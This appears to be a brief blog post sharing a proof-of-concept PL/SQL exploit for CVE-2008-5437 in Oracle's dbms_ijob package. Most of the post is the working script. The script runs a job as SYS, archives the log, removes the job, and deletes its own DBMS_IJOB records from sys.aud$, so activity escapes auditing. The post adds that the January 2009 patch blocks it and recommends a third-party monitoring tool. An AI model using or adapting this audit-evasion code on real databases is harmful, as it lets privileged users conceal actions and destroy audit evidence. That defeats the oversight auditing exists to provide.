Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.
A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.
— Bypassing Oracle Auditing
— Everything executed via dbms_ijob (granted to DBAs by default)
— will not appear in the Oracle auditing
— by Volker Solinus
declare
jj integer := 666666; — job number
begin
sys.dbms_ijob.submit(
JOB => jj,
LUSER => ‚SYS‘,
PUSER => ‚SYS‘,
CUSER => ‚SYS‘,
NEXT_DATE => sysdate,
INTERVAL => null,
BROKEN => false,
WHAT => ‚
declare
jj integer := ‚||jj||‘;
begin
execute immediate “alter system archive log current“;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = “DBMS_IJOB“;
commit;
end;‘,
NLSENV => ‚NLS_LANGUAGE=“AMERICAN“ NLS_TERRITORY=“AMERICA“ NLS_CURRENCY=“$“ NLS_ISO_CURRENCY=“AMERICA“ NLS_NUMERIC_CHARACTERS=“.,“ NLS_DATE_FORMAT=“DD-MON-RR“ NLS_DATE_LANGUAGE=“AMERICAN“ NLS_SORT=“BINARY“‘,
ENV => hextoraw(‚0102000200000000‘));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:
ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32